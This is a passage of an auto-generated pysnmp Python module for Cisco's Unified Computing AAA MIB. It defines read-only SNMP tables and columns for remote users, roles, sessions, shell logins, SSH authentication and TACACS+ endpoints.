if mibBuilder.loadTexts: cucsAaaRealmFsmStageStageStatus.setStatus('current')
cucsAaaRealmFsmTaskTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23), )
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskTable.setStatus('current')
cucsAaaRealmFsmTaskEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRealmFsmTaskInstanceId"))
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskEntry.setStatus('current')
cucsAaaRealmFsmTaskInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskInstanceId.setStatus('current')
cucsAaaRealmFsmTaskDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskDn.setStatus('current')
cucsAaaRealmFsmTaskRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskRn.setStatus('current')
cucsAaaRealmFsmTaskCompletion = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 4), CucsFsmCompletion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskCompletion.setStatus('current')
cucsAaaRealmFsmTaskFlags = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 5), CucsFsmFlags()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskFlags.setStatus('current')
cucsAaaRealmFsmTaskItem = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 6), CucsAaaRealmFsmTaskItem()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskItem.setStatus('current')
cucsAaaRealmFsmTaskSeqId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 23, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRealmFsmTaskSeqId.setStatus('current')
cucsAaaRemoteUserTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24), )
if mibBuilder.loadTexts: cucsAaaRemoteUserTable.setStatus('current')
cucsAaaRemoteUserEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRemoteUserInstanceId"))
if mibBuilder.loadTexts: cucsAaaRemoteUserEntry.setStatus('current')
cucsAaaRemoteUserInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRemoteUserInstanceId.setStatus('current')
cucsAaaRemoteUserDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserDn.setStatus('current')
cucsAaaRemoteUserRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserRn.setStatus('current')
cucsAaaRemoteUserDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserDescr.setStatus('current')
cucsAaaRemoteUserName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserName.setStatus('current')
cucsAaaRemoteUserPwd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserPwd.setStatus('current')
cucsAaaRemoteUserPwdSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 8), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserPwdSet.setStatus('current')
cucsAaaRemoteUserConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 9), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserConfigState.setStatus('current')
cucsAaaRemoteUserConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 24, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRemoteUserConfigStatusMessage.setStatus('current')
cucsAaaRoleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25), )
if mibBuilder.loadTexts: cucsAaaRoleTable.setStatus('current')
cucsAaaRoleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaRoleInstanceId"))
if mibBuilder.loadTexts: cucsAaaRoleEntry.setStatus('current')
cucsAaaRoleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaRoleInstanceId.setStatus('current')
cucsAaaRoleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleDn.setStatus('current')
cucsAaaRoleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleRn.setStatus('current')
cucsAaaRoleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleDescr.setStatus('current')
cucsAaaRoleIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleIntId.setStatus('current')
cucsAaaRoleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleName.setStatus('current')
cucsAaaRolePriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 7), CucsAaaAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRolePriv.setStatus('current')
cucsAaaRoleConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 8), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleConfigState.setStatus('current')
cucsAaaRoleConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRoleConfigStatusMessage.setStatus('current')
cucsAaaRolePolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRolePolicyLevel.setStatus('current')
cucsAaaRolePolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 25, 1, 11), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaRolePolicyOwner.setStatus('current')
cucsAaaSessionTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26), )
if mibBuilder.loadTexts: cucsAaaSessionTable.setStatus('current')
cucsAaaSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSessionInstanceId"))
if mibBuilder.loadTexts: cucsAaaSessionEntry.setStatus('current')
cucsAaaSessionInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSessionInstanceId.setStatus('current')
cucsAaaSessionDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionDn.setStatus('current')
cucsAaaSessionRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionRn.setStatus('current')
cucsAaaSessionHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionHost.setStatus('current')
cucsAaaSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionId.setStatus('current')
cucsAaaSessionIntDel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionIntDel.setStatus('current')
cucsAaaSessionLoginTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 7), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLoginTime.setStatus('current')
cucsAaaSessionPid = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionPid.setStatus('current')
cucsAaaSessionSwitchId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 9), CucsNetworkSwitchId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionSwitchId.setStatus('current')
cucsAaaSessionTerm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionTerm.setStatus('current')
cucsAaaSessionUi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 11), CucsAaaUserInterface()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionUi.setStatus('current')
cucsAaaSessionUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionUser.setStatus('current')
cucsAaaSessionRefreshPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 13), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionRefreshPeriod.setStatus('current')
cucsAaaSessionSessionTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 26, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionSessionTimeout.setStatus('current')
cucsAaaSessionInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56), )
if mibBuilder.loadTexts: cucsAaaSessionInfoTable.setStatus('current')
cucsAaaSessionInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSessionInfoInstanceId"))
if mibBuilder.loadTexts: cucsAaaSessionInfoEntry.setStatus('current')
cucsAaaSessionInfoInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSessionInfoInstanceId.setStatus('current')
cucsAaaSessionInfoDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoDn.setStatus('current')
cucsAaaSessionInfoRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoRn.setStatus('current')
cucsAaaSessionInfoAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoAddress.setStatus('current')
cucsAaaSessionInfoDestIp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoDestIp.setStatus('current')
cucsAaaSessionInfoEtime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 6), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoEtime.setStatus('current')
cucsAaaSessionInfoId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoId.setStatus('current')
cucsAaaSessionInfoPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoPriv.setStatus('current')
cucsAaaSessionInfoType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 9), CucsAaaCimcSessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoType.setStatus('current')
cucsAaaSessionInfoUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoUser.setStatus('current')
cucsAaaSessionInfoUserType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 56, 1, 11), CucsAaaSession()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoUserType.setStatus('current')
cucsAaaSessionInfoTableTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57), )
if mibBuilder.loadTexts: cucsAaaSessionInfoTableTable.setStatus('current')
cucsAaaSessionInfoTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSessionInfoTableInstanceId"))
if mibBuilder.loadTexts: cucsAaaSessionInfoTableEntry.setStatus('current')
cucsAaaSessionInfoTableInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSessionInfoTableInstanceId.setStatus('current')
cucsAaaSessionInfoTableDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoTableDn.setStatus('current')
cucsAaaSessionInfoTableRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 57, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionInfoTableRn.setStatus('current')
cucsAaaSessionLRTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27), )
if mibBuilder.loadTexts: cucsAaaSessionLRTable.setStatus('current')
cucsAaaSessionLREntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSessionLRInstanceId"))
if mibBuilder.loadTexts: cucsAaaSessionLREntry.setStatus('current')
cucsAaaSessionLRInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSessionLRInstanceId.setStatus('current')
cucsAaaSessionLRDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRDn.setStatus('current')
cucsAaaSessionLRRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRRn.setStatus('current')
cucsAaaSessionLRAffected = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRAffected.setStatus('current')
cucsAaaSessionLRCause = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 5), CucsConditionCause()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRCause.setStatus('current')
cucsAaaSessionLRChangeSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRChangeSet.setStatus('current')
cucsAaaSessionLRCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 7), CucsConditionCode()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRCode.setStatus('current')
cucsAaaSessionLRCreated = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 8), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRCreated.setStatus('current')
cucsAaaSessionLRDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRDescr.setStatus('current')
cucsAaaSessionLRId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRId.setStatus('current')
cucsAaaSessionLRInd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 11), CucsConditionActionIndicator()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRInd.setStatus('current')
cucsAaaSessionLRSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 12), CucsConditionSeverity()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRSeverity.setStatus('current')
cucsAaaSessionLRTrig = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 13), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRTrig.setStatus('current')
cucsAaaSessionLRTxId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 14), Unsigned64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRTxId.setStatus('current')
cucsAaaSessionLRUser = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRUser.setStatus('current')
cucsAaaSessionLRSessionId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 27, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSessionLRSessionId.setStatus('current')
cucsAaaShellLoginTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28), )
if mibBuilder.loadTexts: cucsAaaShellLoginTable.setStatus('current')
cucsAaaShellLoginEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaShellLoginInstanceId"))
if mibBuilder.loadTexts: cucsAaaShellLoginEntry.setStatus('current')
cucsAaaShellLoginInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaShellLoginInstanceId.setStatus('current')
cucsAaaShellLoginDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginDn.setStatus('current')
cucsAaaShellLoginRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginRn.setStatus('current')
cucsAaaShellLoginDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginDescr.setStatus('current')
cucsAaaShellLoginId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginId.setStatus('current')
cucsAaaShellLoginIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginIntId.setStatus('current')
cucsAaaShellLoginLocalHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginLocalHost.setStatus('current')
cucsAaaShellLoginName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginName.setStatus('current')
cucsAaaShellLoginRemoteHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginRemoteHost.setStatus('current')
cucsAaaShellLoginSession = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 10), CucsAaaSession()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginSession.setStatus('current')
cucsAaaShellLoginSwitchId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 11), CucsNetworkSwitchId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginSwitchId.setStatus('current')
cucsAaaShellLoginPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginPolicyLevel.setStatus('current')
cucsAaaShellLoginPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 28, 1, 13), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaShellLoginPolicyOwner.setStatus('current')
cucsAaaSshAuthTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29), )
if mibBuilder.loadTexts: cucsAaaSshAuthTable.setStatus('current')
cucsAaaSshAuthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaSshAuthInstanceId"))
if mibBuilder.loadTexts: cucsAaaSshAuthEntry.setStatus('current')
cucsAaaSshAuthInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaSshAuthInstanceId.setStatus('current')
cucsAaaSshAuthDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthDn.setStatus('current')
cucsAaaSshAuthRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthRn.setStatus('current')
cucsAaaSshAuthData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthData.setStatus('current')
cucsAaaSshAuthOldStrType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 5), CucsAaaSshStr()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthOldStrType.setStatus('current')
cucsAaaSshAuthStrType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 29, 1, 6), CucsAaaSshStr()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaSshAuthStrType.setStatus('current')
cucsAaaTacacsPlusEpTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30), )
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpTable.setStatus('current')
cucsAaaTacacsPlusEpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaTacacsPlusEpInstanceId"))
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpEntry.setStatus('current')
cucsAaaTacacsPlusEpInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpInstanceId.setStatus('current')
cucsAaaTacacsPlusEpDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpDn.setStatus('current')
cucsAaaTacacsPlusEpRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpRn.setStatus('current')
cucsAaaTacacsPlusEpDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpDescr.setStatus('current')
cucsAaaTacacsPlusEpFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmDescr.setStatus('current')
cucsAaaTacacsPlusEpFsmPrev = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmPrev.setStatus('current')
cucsAaaTacacsPlusEpFsmProgr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmProgr.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtInvErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtInvErrCode.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtInvErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtInvErrDescr.setStatus('current')
